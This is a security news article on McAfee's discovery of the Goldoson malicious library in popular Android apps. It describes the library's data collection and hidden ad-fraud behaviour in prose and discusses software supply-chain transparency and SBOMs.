Goldoson, discovered and named by researchers at McAfee Labs, can perform a variety of nefarious activities on Android-based devices, they said in a blog post. The malware can collect lists of applications installed, as well as sniff out the location of nearby devices via Wi-Fi and Bluetooth. It also can perform ad fraud by clicking advertisements in the background without the user's consent or knowledge, the researchers said.

Some of the popular apps affected by Goldoson include L.POINT with L.PAY, Swipe Brick Breaker, Money Manager Expense & Budget, Lotte Cinema, Live Score, and GOM. The researchers found more than 100 million downloads of infected apps on Google Play, and 8 million on ONE, South Korea's leading mobile app store, they said.

McAfee reported the infected apps to Google, which quickly notified developers that their apps were in violation of Google Play policies and that they needed to fix their apps, the researchers said. They do not mention in their post if they contacted the ONE app store.

Some apps were removed from Google Play outright while others were updated by the official developers. McAfee is encouraging users of any of the affected apps — a list of which is in the post — to update them to the latest version to remove any trace of Goldoson from their devices.

"While the malicious library was made by someone else, not the app developers, the risk to installers of the apps remains," SangRyol Ryu of McAfee's mobile research team wrote in the post.

**How Goldoson Works**

The Goldoson library registers a device right after it infects it, acquiring remote configurations from a command-and-control server (C2) as the app runs simultaneously. It evades detection by both varying and obfuscating the library name and the remote server domain with each application; developers dubbed it "Goldoson," because this is the first domain name they found, they said.

A remote configuration contains the parameters for each of the app's functionalities and specifies how often it runs the components.

"Based on the parameters, the library periodically checks, pulls device information, and sends them to the remote servers," Ryu wrote.

Goldoson's ability to collect data from all the apps on the device comes from a permission called "QUERY\_ALL\_PACKAGES," that it requests from the device. Users of devices with Android version 11 or above installed appear to be more protected from this query, with only about 10 percent of the cases observed by McAfee demonstrating vulnerability, the researchers said.

The malware requests permissions to access location, storage, or the camera at runtime from devices running Android 6.0 or higher. If location permission is allowed, the infected app can access not only GPS data but also Wi-Fi and Bluetooth info from devices nearby, which gives them more accuracy in locating the infected device, especially indoors, the researchers noted, adding that the ability to identify or discover the location of users puts them at risk for further malicious activity.

Goldoson can also load Web pages without the user knowing — a functionality that attackers can abuse to load ads for financial gain, the researchers said. In technical terms, this works because the library loads HTML code and injects it into a customized and hidden WebView, then produces hidden traffic by visiting the URLs recursively, they explained.

Goldoson sends data it collects from devices out every two days to the attackers, who can change this cycle using remote configuration.

**Third-Party Mobile App Component Risk**

The existence of Goldoson demonstrates once again how swiftly malicious activity can spread when it's a part of third-party or open source components that developers build into applications without knowing that they are infected, the researchers noted.

This was well documented in the Apache Log4j debacle — in which a logging library used in nearly all Java environments was found to contain an easily exploitable vulnerability. The repercussions of Log4j — which has been declared an endemic cyberthreat by the Department of Homeland Security because of how many existing applications remain vulnerable — likely will be felt for years to come.

Indeed, this ability to gain a large malicious footprint quickly and without organizations or developers knowing — and thus before they can react — has not been lost on attackers. In response, they increasingly are targeting the software supply chain with malware or exploits for Log4j and other known vulnerabilities — and will continue to do so as their successes mount, observes a security expert.

"Attackers are becoming more sophisticated in their attempts to infect otherwise legitimate applications across platforms," says Kern Smith, vice president for the Americas for sales engineering at mobile security firm Zimperium.

**Demand for Transparency**

Transparency across organizations and developers' teams appears to be the best way to mitigate software supply chain issues, experts said.

Both developers and organizations using applications that include open source or third-party components "need to assess the risks of these applications and their components, especially as it pertains to a software bill of materials (SBOM)," which provides an inventory of what comprises software components, Smith says.

Indeed, developers should be willing to reveal what libraries and other components are used in applications they develop and deliver to protect users and prevent compromise via infected or vulnerable components, McAfee researchers said.

Developers of external libraries also need to be transparent about their code so organizations and developers leveraging them can understand their behavior and thus be aware quickly of any issue that may arise, they said.

Tag

#android